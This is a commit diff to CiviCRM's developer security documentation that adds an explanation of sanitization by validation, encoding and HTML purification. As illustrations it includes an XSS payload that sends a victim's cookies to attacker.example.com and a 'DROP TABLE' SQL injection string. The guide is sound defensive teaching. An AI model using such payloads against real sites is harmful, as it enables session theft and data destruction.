Skip to content
Snippets Groups Projects
Commit 5c8cf6d8 authored by Sean Madsen's avatar Sean Madsen
Browse files

Security - explain sanitization

parent 59c00863
No related branches found
No related tags found
No related merge requests found
......@@ -35,9 +35,9 @@ With this attack, the response page would display the API key (for any contact t
!!! note
You might think that an input like ``0; DROP TABLE `civicrm_contact` `` would present an [even more serious a vulnerability](https://xkcd.com/327/), but fortunately CiviCRM does not allow [query stacking](http://www.sqlinjection.net/stacked-queries/) which means `executeQuery()` can only execute one query at a time.
### A improvement using sanitizing
### An improvement using sanitizing
In order to fix this security vulnerability, we need to sanitize either (or both!) the input or output as follows:
In order to fix this security vulnerability, we need to sanitize either the input or output (or both!) as follows:
```php
$contactId = CRM_Utils_Request::retrieve(
......@@ -56,6 +56,39 @@ $displayName = CRM_Core_DAO::executeQuery($query, array(
Now, users will only be able to send integers in, and CiviCRM will only be able to send integers out. This is obviously a simplified example, but it illustrates the concepts of inputs, outputs, and sanitizing.
## Sanitization methods
Sanitizing (also sometimes generally called "**escaping**") refers the process of cleaning (or rejecting) data to protect against attacks.
### Validation
The most primitive way to sanitize untrusted data (as in the example above) is to throw an error when it does not conform to the expected format. This works well for data inputs which are of known (and simple) types, but can be much more difficult (and less effective) when used for *outputs* or complex data types.
### Encoding (aka "escaping") {:#encoding}
Encoding alters the untrusted data to suit a *specific output*.
For example, consider the following Smarty code:
```html
<div class="email">{$emailAddress}</div>
```
This works fine with an input of `foo@example.org`. But a string like `<script>window.location='http://attacker.example.com/?cookie='+document.cookie</script>` would present an [XSS](https://excess-xss.com/) vulnerability. If loaded in a victim's browser, this string would send the victim's cookies to the attacker's website and allow the attacker to masquerade as the user.
Using validation to reject email addresses characters like `<` or `>` would prevent the attack, but it would also prevent us from displaying email addresses like `Foo Bar <foo@example.org>`.
By *encoding* the data (for HTML), we change `Foo Bar <foo@example.org>` to `Foo Bar &lt;foo@example.org&gt;`. This prevents the attack and allows us to display any characters we wish.
!!! important
Encoding is specific to output mechanisms. Data embedded within HTML must be encoded differently from data embedded in an SQL query or a shell command.
### Purification
In rare cases such as user-editable rich text fields, CiviCRM cannot use validation or encoding to protect against attacks because the same characters used in attacks are also necessary for presentation. For these cases, CiviCRM uses a 3rd-party library called [HTML Purifier](http://htmlpurifier.org/) which employs sophisticated techniques to [remove XSS](http://htmlpurifier.org/live/smoketests/xssAttacks.php) from HTML strings.
## Escape on Input v Escape on Output
Escaping on input means that developers ensure that every single input from their Interface(s) are properly escaped before passing them into the database. This has a major issue for an application like CiviCRM because there are too many various interfaces to try and do proper escape on Input. There is also a risk that when you escape on input you can dramatically change the value and strip out some data through the escaping process. Where as escaping on output means you have to cover all your various interfaces, ensure that all of them properly and safely account for the possibility that there maybe unsafe data in your database and sanitise it for safe viewing / usage in for example HTML or AngularJS templating.
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment